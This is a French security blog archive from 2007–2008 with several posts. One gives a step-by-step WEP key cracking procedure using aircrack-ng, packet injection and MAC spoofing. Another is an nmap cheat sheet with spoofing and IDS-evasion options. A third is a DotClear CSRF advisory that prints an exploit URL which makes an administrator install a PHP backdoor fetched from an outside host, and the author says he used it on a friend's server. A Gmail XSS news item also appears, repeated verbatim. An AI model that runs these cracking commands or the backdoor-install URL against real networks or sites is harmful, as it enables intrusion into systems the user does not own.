Archive de la catégorie «Sécurité»

Aircrack-NG avec une carte Wireless Intel 3945 ABG

Envoyé 15 mai 2008
Classé dans : Logiciels Libres, Planet-Libre.org, Sécurité | Mots-clefs : , , , , , ,
* Commentaires (11)

Ce petit ‘tuto’ est plus un pense bête qu’un article, mais il est possible qu’il aide quelques personnes dans leur démarche de sécurisation de réseau Wifi (ou pas ?!)

Depuis quelques semaines j’ai un nouveau portable pour le taf, un Dell latitude D520, intégrant un chipset Intel, et ayant une carte wifi

    $ lspci


    c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG Network Connection (rev 02)

Il se trouve que sur d’autres distributions, les drivers intégrés au kernel étaient compatibles, mais sur la petite distribution Ubuntu 8.04, les drivers ne sont plus compatible pour accepter le “mode monitor”.

Avant de commencer tout cela, un petit rappel des faits.

AirCrack-NG

Aircrack-ng est un groupe d’outils de monitoring pour réseau sans fil dont l’utilisation principale est le « cassage » de clés WEP et WPA-PSK.

Aircrack fut développé sous licence GPL par Christophe Devine (consultant en sécurité informatique) puis repris par Thomas d’Otreppe sous le nom de Aircrack-ng.

La version 0.9, comprend entre autres les outils suivants:

  • aircrack-ng: casseur de clés WEP statiques et WPA-PSK (Nouveau type de casseur: PTW)
  • airdecap-ng: décrypteur de fichiers WEP/WPA capturés
  • aireplay-ng: programme d’injection de paquets 802.11 (disponible sous Linux et FreeBSD seulement)
  • airodump-ng: programme de capture de paquets 802.11
  • airtun-ng: programme pour la création d’une interface virtuelle

note: Ce logiciel est conçu pour tester la sécurité de son propre réseau, l’attaque d’un réseau extérieur sans l’accord de son propriétaire est passible de peines d’emprisonnement.

Pré-requis

* Vous possédez une machine linux avec Hardy Heron fraîchement installé, je n’ai ni le temps ni la volonté de tester sur un système amélioré
* Vous avez réussi à compiler / installer les précédentes versions du pilote ipwraw (ceci je l’explique par la suite)
* Vous savez comment utiliser Aircrack-ng (un minimum)
* Vous possédez une clé WEP (Weak Encryption Protocol :D )
* Vous pouvez utiliser le CLI (ahhhhhhhh, linux, votre CLI, un outil puissant et un mal de tête assuré pour les néophytes … CLI = Command Line Interface … La ligne de commande)
* Les LETTRES MAJUSCULES dans la procédure de crackage de la clé WEP sont des paramètres FICTIFS pour
- CHANNEL, le canal qui sera reniflé / injecté
- FILE, un nom de fichier
- ESSID, le nom du point d’accès tels que FREEPHONIE, LIVEBOX, …
- BSSID, le point d’accès adresse
- MACADDRESS, votre adresse mac de la carte wifi
* Vous l’utilisez sous votre propre risque
* Vous savez ce que le diable va faire

Installation

Rien de plus simple sous Ubuntu :

sudo apt-get install aircrack-ng macchanger

Configuration de la carte 3945 ABG (ipw3945 ou iwl3945)

Il se trouve donc que les drivers fournis avec la distribution ne sont pas compatible pour que aircrack-ng fonctionne correctement, et puis scanner les réseaux Wifi. Il faut donc mettre en place des “drivers alternatifs”, que nous fournis gentillement le site de aircrack-ng :D

Pré-requis

sudo apt-get install linux-headers-`uname -r` build-essential libssl-dev macchanger

Installation

  • wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
    • 

  • tar -xjf ipwraw-ng*
    • 

  • cd ipwraw-ng
    • 

  • make
    • 

  • sudo make install
    • 

  • sudo make install_ucode
    • 

  • echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
    • 

  • sudo depmod -ae
    •

    Maintenant, les drivers modifiés on été installés. Il faut donc décharger les drivers “officiels” pour charger ceux qui permettrons d’utiliser Aircrack-ng (les drivers iwpraw)

    Utiliser ipwraw

    • Décharger le module ipw3945 (ou iwl3945 sur ma machine)
    • Lancer ipwraw-ng

    Le périphérique créé sera automatiquement en mode Monitor.

    sudo modprobe -r ipw3945

    ou

    sudo modprobe -r iwl3945
    sudo modprobe ipwraw

    Le nouveau périphérique créé aura comme nom wifi0

    sckyzo@sckyzo:~$ iwconfig
    lo        no wireless extensions.
    eth0      no wireless extensions.
    wifi0     unassociated  ESSID:off/any
    Mode:Monitor  Channel=1  Bit Rate=54 Mb/s
    

    Voila, vous pouvez maintenant utiliser aircrack-ng pour sécuriser votre Wifi (ou pas ?!)
    

    Bien sur, après utilisation des drivers alternatifs avec aircrack, il vous faut recharger les modules ipw3945 ou iwl3945
    

    sudo modprobe -r ipwraw
    

    sudo modprobe iwl3945
    

    ou
    

    sudo modprobe ipw3945
    

    Maintenant, les drivers fonctionnent (enfin). Alors que faire maintenant ?  Passons à l’action :
    
Ouvrer un terminal, et copier ceci :
    

    #!/bin/bash

  • clear
    • 

  • echo "Please provide the wifi0 CHANNEL"
    • 

  • read canal
    • 

  • echo "Please provide the capture rate (best results with only 2)"
    • 

  • read rate
    • 

  • echo "Please provide the target BSSID"
    • 

  • read bssid
    • 

  • ifconfig wifi0 down
    • 

  • chmod u+wrx /sys/class/net/wifi0/device/rate
    • 

  • echo $rate >/sys/class/net/wifi0/device/rate
    • 

  • echo $canal >/sys/class/net/wifi0/device/channel
    • 

  • echo $bssid >/sys/class/net/wifi0/device/bssid
    • 

  • ifconfig wifi0 up
    • 

  • echo "Configuration completed. Ready to do packet injection"
    • 

    

    Enregistrez le document tel que : wepcrackconf.sh et attribuez les droits adéquates pour qu’il puisse être exécuté.
    

    sudo chmod +x wepcrackconf.sh
    

    Crackage
    

    Ouvrez 4 terminaux (oui c’est beaucoup, mais il les faut)
    

    Premier terminal
    

    sudo airodump-ng wifi0
    

    Second terminal
    

    sudo su
./wepcrackconf.sh
    

      

    • CHANNEL, choisissez le Canal de votre choix
      • 

    • rate toujours 2
      • 

    • BSSID, donné par le terminal précédent
      • 

    

    exit
    

    sudo airodump-ng -c CHANNEL -w FILE wifi0
    

    Troisième terminal
    

    sudo macchanger -s wifi0
    

    sudo aireplay-ng -1 10 -e "ESSID" -a BSSID -h MAC_ADRESSE wifi0
    

    Quatrième terminal
    

    aireplay-ng -3 -b BSSID -h MAC_ADRESSE wifi0
    

    De retour sur le premier terminal
    
Après avoir récolté assez de IV, faites Ctrl+C pour stopper l’application
    

    aircrack-ng FILE.cap
    

    IMPORTANT :
    
Recueillir au moins 500000 paquets, pour casser une WEP 64-bit Hex
    
Vous pouvez changer l’adresse MAC il suffit de lire les infos ou macchanger page du manuel (man macchanger)
    

    Si toutefois vous avez des questions, n’hésitez pas.
    
Je complèterai l’article au fur et à mesure de ma pensé
    

    Mise à jour : Aircrack-ng Configuration et mise en route
    
- Utilisation de macchanger (apt-get)
    
- Lancement de Aircrack et sa suite (airodump, airemachin ….)
    
- Crackage clé WEP
    
- Script
    
Bien évidemment, je suis resté très simpliste sur les termes et les fonctions car je pars du principe que je m’adresse à des gens connaissant le domaine. Sinon, un lien (ci dessous) renvois sur un tuto assez complexe et instructif bien qu’un peu depassé (mais tant que ça fonctionne … hein ^^)
    

    Liens utiles :
    
http://fr.wikipedia.org/wiki/Mode_moniteur
    
http://fr.wikipedia.org/wiki/Aircrack
    
http://www.aircrack-ng.org
    
http://www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php
    

    
    
    
  
    
    
    
    
     
      Tutoriel MetaSploit 2.x par SecuObs       
    
    
    
	Envoyé 14 mars 2008
    
	Classé dans : Planet-Libre.org, Sécurité | Mots-clefs : , , , 
    
	* Commentaires (2)        
    
    
    
      
    Tout à l’heure, j’ai reçu un mail de SecuObs indiquant la mise à disposition d’un tutoriel en 7 parties sur MetaSploit.
    

    Pour rappel Metasploit est un projet open-source sur la sécurité informatique qui fournit des informations sur des vulnérabilités, aide à la pénétration de systèmes informatisés et au développement de signatures pour les IDS. Le plus connu des sous-projets est le Metasploit Framework, un outil pour le développement et l’exécution d’exploits contre une machine distante. Les autres sous-projets importants sont la base de données d’Opcode, l’archive de shellcode, et la recherche dans la sécurit. (Wikipédia)
    

    

    MetaSploit Tuto partie 1 
    
MetaSploit Tuto partie 2
    
MetaSploit Tuto partie 3
    
MetaSploit Tuto partie 4
    
MetaSploit Tuto partie 5
    
MetaSploit Tuto partie 6
    
MetaSploit Tuto partie 7
    

    
    
    
  
    
    
    
    
     
      NMap. Scanner de Ports       
    
    
    
	Envoyé 12 mars 2008
    
	Classé dans : Planet-Libre.org, Sécurité | Mots-clefs : , , , , 
    
	* Commentaires (1)        
    
    
    
      
    http://doc.fedora-fr.org/w/images/e/e2/Nmap.gifNmap est un scanner de ports open source créé par Fyodor et distribué par Insecure.org. Il est conçu pour détecter les ports ouverts, les services hébergés et les informations sur le système d’exploitation d’un ordinateur distant. Ce logiciel est devenu une référence pour les administrateurs réseaux car l’audit des résultats de Nmap fournit des indications sur la sécurité d’un réseau.
    

    Cet article est une amélioration de l’article relativement complet de Pti-Seb accessible ici 
    

    ♦ Utilisation principale de nmap
    

    Voir tous les ports TCP ouverts sur une machine, utilisation de messages SYN, donc pas de log sur la machine cible :
    

    # nmap -sS 127.0.0.1
    

    Voir tous les ports UDP ouverts sur une machine :
    

    # nmap -sU 127.0.0.1
    

    Voir si une machine est sur le réseau (scan Ping) :
    

    # nmap -sP 127.0.0.1
    

    Scanner une plage d’adresses. Ici toutes les adresses de 192.168.0 à 192.168.255 :
    

    # nmap 192.168.0,.0-255
    

    Connaître le système d’exploitation de la machine (TCP/IP fingerprint) :
    

    # nmap -O 127.0.0.1
    

    Si nmap n’arrive pas à déterminer la version, on pourra lui demander de nous donner une liste des systèmes qui pourraient potentiellement correspondre :
    

    # nmap -O --osscan-guess 127.0.0.1
    

    Scanner un port précis. Ici, c’est le port http :
    

    # nmap -p 80 127.0.0.1
    

    Scanner une plage de ports. Ici on scan du port 0 au 80 et tous ceux supérieurs à 60000 ) :
    

    # nmap -p 0-80,60000 127.0.0.1
    

    Scanner des serveurs web au hasard sur le réseau :
    

    # nmap -v -sS -iR 0 -p 80
    

    Désactiver la résolution DNS inverse des hôtes, augmente la rapidité :
    

    # nmap -n 127.0.0.1
    

    Scan par rebond ftp, permet de demander à un serveur FTP de scanner les ports à votre place (envoie des fichiers pour tester les ports ouverts). Cette fonctionnalité est souvent désactivée des serveurs FTP afin d’éviter les abus. Ici on passe par le serveur ftp qui a pour adresse 127.0.0.1 pour scanner une plage d’adresses ip :
    

    # nmap -b 127.0.0.1 192.168.0,.0-255
    

    Usurper l’adresse ip source. Ici on scan 127.0.0.1, par l’interface réseau eth0, en se faisant passer pour 10.0.0.0 depuis le port 80 :
    

    # nmap -S 10.0.0.0 -g 80 -e eth0 -P0 127.0.0.1
    

    Usurper l’adresse MAC :
    

    # nmap --spoof-mac 01:02:03:04:05:06:07 127.0.0.1# nmap --spoof-mac Cisco 127.0.0.1
    

    Choisir un fichier de sortie pour y écrire les résultats du scan :
    

    # nmap -oN resultat 127.0.0.1# nmap -oX resultat.xml 127.0.0.1
    

    Trace les paquets et les données envoyés et reçus. Pratique pour verifier qu’une usurpation fonctionne :
    

    # nmap --packet-trace -S 10.0.0.0 -eth0 127.0.0.1
    

    ♦ Solution
    

    Empêcher le balayage des ports d’une machine reste assez difficile en soi. En effet, même en rajoutant des règles à iptables, les techniques de scan étant tellement diverses, cela ne sera ne fonctionnera pas à 100%, En revanche, on peut très bien utiliser des outils spécialisés dans la détection de ces derniers comme scanlogd par exemple. Pour s’en servir, nous allons devoir récupérer les sources sur le site officel et lancer les commandes suivantes :
    

    # cd /usr/local/src
# tar zxvf scanlogd-*.tar.gz
# rm -f scanlogd-*.tar.gz
# cd scanlogd-*/
# make linux
# adduser scanlogd
    

    On pourra ensuite le lancer manuellement, via la commande scanlogd. Toutes les tentatives de scan sur la machine seront alors visibles dans le fichier “/var/log/messages”:
    

    # tail -100 /var/log/messages | grep scanlogd
Dec 3 17:54:43 localhost scanlogd: 192.168.31.112 to 192.168.31.101 ports 80, 554, 256, 21, 22, 23      64 @15:24:41
    

    ♦ Aller plus loin
    

    Commande : # man nmap
    

    Dans la suite de l’article, je vous met d’autres options trouvées sur la toile, que l’on a pour le Scanner NMap
    

    

    Liens utiles : 
    
http://fr.wikipedia.org/wiki/Nmap 
    
http://nmap.org/
    
Guide de référence Nmap en Fr
    
L’art du “PortScanning”
    
Testeur de vulnérabilités sur le net
    

    

    Petites Anecdotes :
    
Nmap étant un logiciel de plus en plus connu, on a pu voir des exemples d’utilisation dans plusieurs films.
    
Dans le second épisode de la trilogie Matrix (Matrix Reloaded), Trinity se sert de nmap pour pirater la centrale électrique.
    
Le troisième opus de la saga Jason Bourne, La Vengeance dans la peau, montre la CIA utiliser nmap ainsi que son GUI Zenmap pour s’introduire dans le serveur d’un journal (The Guardian)
    

      

    • Spécifications des cibles :
      • 

    

    Les cibles peuvent être spécifiées par des noms d’hôtes, des adresses IP (v4 ou v6), des adresses de réseaux… Exemple: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0-255.0-255.1-254
    

      -iL <inputfilename>: Lit la liste des hôtes/réseaux cibles à partir du fichier
  -iR <num hosts>: Choisit les cibles au hasard
    --exclude <host1[,host2][,host3],...>: Exclut des hôtes/réseaux du scan
    --excludefile <exclude_file>: Exclut des hôtes/réseaux des cibles à partir du fichier
    

      

    • Découverte des hôtes :
      • 

    

      -sL: List Scan - Liste simplement les cibles à scanner
  -sP: Ping Scan - Ne fait que déterminer si les hôtes sont en ligne -P0: Considère que tous les hôtes sont en ligne-- évite la découverte des hôtes
  -PN: Considérer tous les hôtes comme étant connectés -- saute l'étape de découverte des hôtes
  -PS/PA/PU [portlist]: Découverte TCP SYN/ACK ou UDP des ports en paramètre
  -PE/PP/PM: Découverte de type requête ICMP echo, timestamp ou netmask
  -PO [num de protocole]: Ping IP (par type)
  -n/-R: Ne jamais résoudre les noms DNS/Toujours résoudre [résout les cibles actives par défaut]
    --dns-servers <serv1[,serv2],...>: Spécifier des serveurs DNS particuliers
    --system-dns: Utilise le resolveur DNS du système d'exploitation
    

      

    • Techniques de scan :
      • 

    

      -sS/sT/sA/sW/sM: Scans TCP SYN/Connect()/ACK/Window/Maimon
  -sN/sF/sX: Scans TCP Null, FIN et Xmas
  -sU: Scan UDP (Cette option ne fonctionne pas en IPv6)
    --scanflags <flags>: Personnalise les flags des scans TCP
  -sI <zombie host[:probeport]>: Idlescan (scan passif)
  -sO: Scan des protocoles supportés par la couche IP
  -b <ftp relay host>: Scan par rebond FTP
    --traceroute: Détermine une route vers chaque hôte
    --reason: Donne la raison pour laquelle tel port apparait à tel état
    

      

    • Spécifications des ports et ordre de scan :
      • 

    

      -p <plage de ports>: Ne scanne que les ports spécifiés
    Exemple: -p22; -p1-65535; -pU:53,111,137,T:21-25,80,139,8080
  -F: Fast - Ne scanne que les ports listés dans le fichier nmap-services
  -r: Scan séquentiel des ports, ne mélange pas leur ordre
    --top-ports <nombre>: Scan <nombre> de ports parmi les plus courants
    --port-ratio <ratio>: Scan <ratio> pourcent des ports les plus courants
    

      

    • Détection de service/version :
      • 

    

      -sV: Teste les ports ouverts pour déterminer le service en écoute et sa version
    --version-light: Limite les tests aux plus probables pour une identification plus rapide
    --version-intensity <niveau>: De 0 (léger) à 9 (tout essayer)
    --version-all: Essaie un à un tous les tests possibles pour la détection des versions
    --version-trace: Affiche des informations détaillées du scan de versions (pour débogage)
    

      

    • Script scan :
      • 

    

      -sC: équivalent de --script=safe,intrusive
    --script=<lua scripts>: <lua scripts> est une liste de répertoires ou de scripts séparés par des virgules
    --script-args=<n1=v1,[n2=v2,...]>: passer des arguments aux scripts
    --script-trace: Montre toutes les données envoyées ou recues
    --script-updatedb: Met à jour la base de données des scripts. Seulement fait si -sC ou --script a été aussi donné.
    

      

    • Détection de système d’exploitation :
      • 

    

      -O: Active la détection d'OS
    --osscan-limit: Limite la détection aux cibles prométeuses
    --osscan-guess: Devine l'OS de facon plus agressive
    

      

    • Temporisation et performance :
      • 

    

    Les options qui prennent un argument de temps sont en milisecondes a moins que vous ne spécifiiez ’s’ (secondes), ‘m’ (minutes), ou ‘h’ (heures) à la valeur (e.g. 30m).
    

      -T[0-5]: Choisit une politique de temporisation (plus élevée, plus rapide)
    --min-hostgroup/max-hostgroup <msec>: Tailles des groupes d'hôtes à scanner en parallèle
    --min-parallelism/max-parallelism <msec>: Parallélisation des paquets de tests (probes)
    --min_rtt_timeout/max-rtt-timeout/initial-rtt-timeout <msec>: Spécifie le temps d'aller-retour des paquets de tests
    --min_rtt_timeout/max-rtt-timeout/initial-rtt-timeout <msec>: Spécifie le temps d'aller-retour des paquets detests
    --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Précise le round trip time des paquets de tests.
    --max-retries <tries>: Nombre de retransmissions des paquets de tests des scans de ports.
    --host-timeout <msec>: Délai d'expiration du scan d'un hôte
    --scan-delay/--max-scan-delay <time>: Ajuste le délais entre les paquets de tests.
    

      

    • Evasion parefeu/ids et usurpation d’identité :
      • 

    

      -f; --mtu <val>: Fragmente les paquets (en spécifiant éventuellement la MTU)
  -D <decoy1,decoy2[,ME],...>: Obscurci le scan avec des leurres
  -S <IP_Address>: Usurpe l'adresse source
  -e <iface>: Utilise l'interface réseau spécifiée
  -g/--source-port <portnum>: Utilise le numéro de port comme source
    --data-length <num>: Ajoute des données au hasard aux paquets émis
    --ip-options <options>: Envoi des paquets avec les options IP spécifiées.
    --ttl <val>: Spécifie le champ time-to-live IP
    --spoof-mac <adresse MAC, préfixe ou nom du fabriquant>: Usurpe une adresse MAC
    --badsum: Envoi des paquets TCP/UDP avec une somme de contrôle erronée.
    

      

    • Sortie :
      • 

    

      -oN/-oX/-oS/-oG <file>: Sortie dans le fichier en paramètre des résultats du scan au format normal, XML, s|<rIpt kIddi3 et Grepable, respectivement
  -oA <basename>: Sortie dans les trois formats majeurs en même temps
  -v: Rend Nmap plus verbeux (-vv pour plus d'effet)
  -d[level]: Sélectionne ou augmente le niveau de débogage (significatif jusqu'à 9)
    --packet-trace: Affiche tous les paquets émis et reçus
    --iflist: Affiche les interfaces et les routes de l'hôte (pour débogage)
    --log-errors: Journalise les erreurs/alertes dans un fichier au format normal
    --append-output: Ajoute la sortie au fichier plutôt que de l'écraser
    --resume <filename>: Reprend un scan interrompu
    --stylesheet <path/URL>: Feuille de styles XSL pour transformer la sortie XML en HTML
    --webxml: Feuille de styles de références de Insecure.Org pour un XML plus portable
    --no_stylesheet: Nmap n'associe pas la feuille de styles XSL à la sortie XML
    

      

    • Divers :
      • 

    

      -6: Active le scan IPv6
  -A: Active la détection du système d'exploitation et des versions
    --datadir <dirname>: Spécifie un dossier pour les fichiers de données de Nmap
    --send-eth/--send-ip: Envoie des paquets en utilisant des trames Ethernet ou des paquets IP bruts
    --privileged: Suppose que l'utilisateur est entièrement privilégié -V: Affiche le numéro de version
    --unprivileged: Suppose que l'utilisateur n'a pas les privilèges d'usage des raw socket
  -h: Affiche ce résumé de l'aide
    

    
    
    
  
    
    
    
    
     
      MSNCleaner, débarrassez vous des Virus MSN       
    
    
    
	Envoyé 8 novembre 2007
    
	Classé dans : Sécurité | Mots-clefs : , , , , , , 
    
	* Commentaires (1)        
    
    
    
      
    J’écris cet article suite à la découverte d’un petit soft fort sympathique : MSNCleaner 1.4.5 (à l’heure ou j’écris ces lignes).
    
Certains vont me dire, mais que viens-tu faire dans le monde Windows ?  Voila, depuis  maintenant 1 an … J’en ai marre de tous ces gens qui ne comprennent pas qu’il ne faut pas cliquer sur le lien quand  un ami à vous vous parle subitement espagnol et vous propose de télécharger un fichier style album.zip … ou alors quand un de vos amis, fils unique, vous propose de télécharger les photos nu de sa soeur … Ya quand même un grand nombre d’imbéciles qui cliquent. Le problème, c’est que après ils se retrouvent avec un PC infecté jusqu’a la moelle, avec des backdoors ouvertes dans tous les sens, et ils ralent, pleurent et qui c’est qui font chier ?? les mecs qui sont informaticien !! Alors pour peu que (comme moi) vous soyez linuxien avec un grand coeur, je vous dis pas comme c’est chiant ! (et puis c’est là que l’on voit le nombre de personne assez stupides pour cliquer sur les liens … Si vous vous sentez viser, c’est peut être pour vous faire réfléchir !)
    
Bref, vous l’aurez compris, ce logiciel est fait pour vous si vous faites partie des contaminés de MSN Messenger de Microsoft (car bien sur, il existe une multitudes de logiciels similaires, gratuit, open source et sécurisé … mais tout le monde utlisent MSN Messenger !!!)
    

    Voici une petite liste des saloperies que peux supprimer MSNCleaner :
    

      

    • Foto_Celular.scr
      • 

    • Foto_Celular.zip
      • 

    • Foto_Posse.zip
      • 

    • Bush.exe
      • 

    • Desnuda.exe
      • 

    • F0538_jpg.zip
      • 

    • Fotos.zip – Fotos roberto.exe
      • 

    • imag091307.zip
      • 

    • image.zip
      • 

    • imageXX.zip
      • 

    • IMG-XXXX.zip
      • 

    • img4851.zip
      • 

    • IMG-0024.zip
      • 

    • IMG0024.zip
      • 

    • MessengerSkinner
      • 

    • MSN Content Plus
      • 

    • MSN Messenger Guiños
      • 

    • My_Pictures2007
      • 

    • MyGallery5156.zip
      • 

    • N039_jpg.zip
      • 

    • Nokia_19_jpg.zip
      • 

    • p0017_jpg.zip
      • 

    • Photos-webcam2007.zip
      • 

    • picts-XXXX.zip
      • 

    • PictureAlbum2007.zip
      • 

    • portaldeayuda – portaldeayudita
      • 

    • S_00305_jpg.zip
      • 

    • W139_jpg.zip
      • 

    • Winks Instalador
      • 

    • Z058_jpg.zip
      • 

    

    Un petit ScreenShot pour la route :
    

    

     
    

     Le logiciel est disponible en
    

      

    • Espagnol
      • 

    • Portuguais
      • 

    • Francais
      • 

    •  Allemand
      • 

    • Danois
      • 

    • Hollandais
      • 

    • Italien
      • 

    • Anglais
      • 

    

    L’application ne nécessite aucune installation et peut donc être exécutée depuis une clé USB, ce qui est utile pour dépanner le PC d’un proche. Le logiciel est d’origine espagnole mais l’interface est proposée en plusieurs langues dont le français. Le fonctionnement est très simple : un bouton lance une analyse et un deuxième bouton permet de supprimer es fichiers détectés. Il est également possible de débloquer Internet Explorer et d’autoriser divers composants comme le gestionnaire de tâches ou le panneau de configuration pendant l’analyse, ainsi que de générer un rapport.
    

    Donc un logiciel, Simple, Efficace, Gratuit et en Francais … Bref … le Must, et donc fini les emmerdeurs !! :D
    
See yOu sOon ;-)
    
Et pensez à mettre à jour vos PC, vos logiciels (msn) et si vous ne voulez plus d’emmerde de ce genre … po po po —> Linux :) 
    

    
    
    
  
    
    
    
    
     
      Hacked By … Go_Ogle       
    
    
    
	Envoyé 26 septembre 2007
    
	Classé dans : Sécurité | 
    
	* Commentaires (1)        
    
    
    
      
    Les utilisateurs des Gmail, Picassa, Calendar et autres services du géant de la recherche doivent se méfier…
    

    Quatre nouvelles techniques permettant de voler les données personnelles des utilisateurs des services de la firme de Mountain View viennent d’être découvertes.
    

    Lesdites méthodes reposent toutes sur l’utilisation de la faille de sécurité qui touche de nombreux sites Web : le Cross Site Scripting, ou XSS. Les garnements de la Toile peuvent utiliser le XSS pour exécuter du code malveillant en langage de script qui est ensuite utilisé par le navigateur Web lors de la visite d’une URL.
    

    La plus sérieuse de ces vulnérabilités se trouve dans l’application étiquetée Google, qui permet de réaliser des sondages. Cette dernière est disponible depuis le groupe de discussion Google Groups. Cette faille permettrait de dérober des contacts, des mails et des comptes Gmail. Selon un porte-parole de Google la faille a été corrigée.
    

    Des morceaux de codes malveillants utilisables (proof of concept) ont été publiés sur le Web. Ils permettent de montrer les faiblesses des services de Google. D’après un ingénieur à l’origine de ces publications : “Si vous êtes bon en JavaScript, écrire un code capable d’exploiter ces vulnérabilités est un vrai jeu d’enfant.”
    

    Quatre navigateurs sont touchés par ces vulnérabilités, IE, Firefox, Opera et Konqueror. Du moins lorsque les paramètres sont configurés par défaut et que l’utilisateur n’utilise pas d’extensions qui bloquent le JavaScript. Pour être touchée, la victime doit être identifiée sur Gmail.
    

    La deuxième vulnérabilité concerne l’appliance Google search. Il s’agit d’une solution que Google propose aux webmasters pour lancer des recherches internes. En créant une URL spéciale, un attaquant peut injecter du code et réécrire des pages d’un site tiers qui utilise cette appliance. Selon Google, près de 200.000 sites sont vulnérables à cette attaque.
    

    La troisième vulnérabilité peut être utilisée pour dérober des photos stockées via le logiciel de gestion de retouche et de partage des images Picasa. Elle permet de rediriger l’utilisateur vers un site malveillant. Il s’agit d’un exploit très complexe qui utilise différentes techniques dont du XSS. Selon un porte-parole de Google, la vulnérabilité qui touche Picasa est difficilement exploitable et il recommande aux utilisateurs du service de ne pas télécharger de nouveaux boutons pour modifier l’aspect de l’application, car ils sont utilisés par les hackers pour diffuser du code.
    

    La quatrième faille de sécurité a été découverte par Petko D. Petkov, un chercheur de GNU Citizen qui a publié sur son blog une note selon laquelle une porte dérobée pourrait être installée sur les comptes Gmail en obligeant des utilisateurs à visiter une URL frauduleuse.
    

    Ledit site contient un programme qui redirige les mails envoyés depuis Gmail vers l’adresse collect@evil.com. Petkov ne donne pas la proof of concept de l’attaque, mais l’information semble fiable. Le danger de cette méthode est que les utilisateurs ne peuvent pas repérer l’attaque facilement, ils doivent se rendre dans la section “filtre” dans les paramètres de configuration de Gmail.
    

    

    

    

    Source : Silicon.fr
    

    
    
    
  
    
    
    
    
     
      Hacked By … Go_Ogle       
    
    
    
	Envoyé 26 septembre 2007
    
	Classé dans : Sécurité | 
    
	* Commentaires (1)        
    
    
    
      
    Les utilisateurs des Gmail, Picassa, Calendar et autres services du géant de la recherche doivent se méfier…
    

    Quatre nouvelles techniques permettant de voler les données personnelles des utilisateurs des services de la firme de Mountain View viennent d’être découvertes.
    

    Lesdites méthodes reposent toutes sur l’utilisation de la faille de sécurité qui touche de nombreux sites Web : le Cross Site Scripting, ou XSS. Les garnements de la Toile peuvent utiliser le XSS pour exécuter du code malveillant en langage de script qui est ensuite utilisé par le navigateur Web lors de la visite d’une URL.
    

    La plus sérieuse de ces vulnérabilités se trouve dans l’application étiquetée Google, qui permet de réaliser des sondages. Cette dernière est disponible depuis le groupe de discussion Google Groups. Cette faille permettrait de dérober des contacts, des mails et des comptes Gmail. Selon un porte-parole de Google la faille a été corrigée.
    

    Des morceaux de codes malveillants utilisables (proof of concept) ont été publiés sur le Web. Ils permettent de montrer les faiblesses des services de Google. D’après un ingénieur à l’origine de ces publications : “Si vous êtes bon en JavaScript, écrire un code capable d’exploiter ces vulnérabilités est un vrai jeu d’enfant.”
    

    Quatre navigateurs sont touchés par ces vulnérabilités, IE, Firefox, Opera et Konqueror. Du moins lorsque les paramètres sont configurés par défaut et que l’utilisateur n’utilise pas d’extensions qui bloquent le JavaScript. Pour être touchée, la victime doit être identifiée sur Gmail.
    

    La deuxième vulnérabilité concerne l’appliance Google search. Il s’agit d’une solution que Google propose aux webmasters pour lancer des recherches internes. En créant une URL spéciale, un attaquant peut injecter du code et réécrire des pages d’un site tiers qui utilise cette appliance. Selon Google, près de 200.000 sites sont vulnérables à cette attaque.
    

    La troisième vulnérabilité peut être utilisée pour dérober des photos stockées via le logiciel de gestion de retouche et de partage des images Picasa. Elle permet de rediriger l’utilisateur vers un site malveillant. Il s’agit d’un exploit très complexe qui utilise différentes techniques dont du XSS. Selon un porte-parole de Google, la vulnérabilité qui touche Picasa est difficilement exploitable et il recommande aux utilisateurs du service de ne pas télécharger de nouveaux boutons pour modifier l’aspect de l’application, car ils sont utilisés par les hackers pour diffuser du code.
    

    La quatrième faille de sécurité a été découverte par Petko D. Petkov, un chercheur de GNU Citizen qui a publié sur son blog une note selon laquelle une porte dérobée pourrait être installée sur les comptes Gmail en obligeant des utilisateurs à visiter une URL frauduleuse.
    

    Ledit site contient un programme qui redirige les mails envoyés depuis Gmail vers l’adresse collect@evil.com. Petkov ne donne pas la proof of concept de l’attaque, mais l’information semble fiable. Le danger de cette méthode est que les utilisateurs ne peuvent pas repérer l’attaque facilement, ils doivent se rendre dans la section “filtre” dans les paramètres de configuration de Gmail.
    

    

    

    

    Source : Silicon.fr
    

    
    
    
  
    
    
    
    
     
      [ALERTE] Faille DotClear       
    
    
    
	Envoyé 11 juillet 2007
    
	Classé dans : Sécurité, Ubuntu | 
    
	* Commentaires (10)        
    
    
    
      
    Source : http://ar3av.free.fr/faille-dotclear.php
    

    Bulletin de sécurité
    
http://ar3av.free.fr/faille-dotclear.php
    
=======================================
    

    Software: DotClear
    
Date: 08 Juillet 2007
    
Versions affectées: 1.2.6 et versions antérieures / 2.0 beta 6 et versions antérieures
    
Type de la faille: CSRF & XSS
    
Découvreur: PsychoGun
    

    DotClear est un blog populaire écrit en PHP dans lequel j’ai découvert de nombreuses vulnérabilités. Cette application web offre à son administrateur une interface de gestion qui permet de le configurer, mais le problème réside dans le fait que cette interface ne respecte pas les conventions rudimentaires de sécurité. Ainsi le blog ne vérifie jamais correctement la provenance des données qui lui sont envoyées, et c’est pourquoi il est possible de faire accomplir des actions à l’administrateur sans son consentement.
    

    Pour peu qu’il soit logué sur son compte, on peut faire supprimer, activer ou désactiver des plugins à l’administrateur. On peut aussi lui faire ajouter des plugins infectés par des backdoor écrites en php et prendre, de cette manière, le contrôle du serveur. A noter que le plugin qui permet d’en ajouter d’autres fait partie de la configuration minimale de DotClear. J’ai déjà exploité cette faille pour faire une plaisanterie à un ami. Son site était composé d’un blog et d’un forum. J’ai posté une fausse image sur son forum qui réalisait une re-direction vers une url de ce type:
    

    http://victim.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/malicious-file.pkg.gz&p=toolsmng
    

    Sans le savoir, en ne cliquant sur aucun lien et en visualisant une page de son propre site, l’administrateur à installé une backdoor écrite en php sur son serveur. J’avais donc obtenu le contrôle de ce serveur grâce à une vulnérabilité de DotClear aussi stupéfiante que facile à exploiter. Mon fichier “malicious-file.pkg.gz” a été produit avec un outil de DotClear et il contenait des fichiers php qui ont donc été placés sur le serveur. Il ne devrait pas être possible de faire ce genre de choses, et c’est parce que DotClear n’utilise pas un système de token qu’il est vulnérable. Cette faille est présente partout ailleurs sur le blog.
    
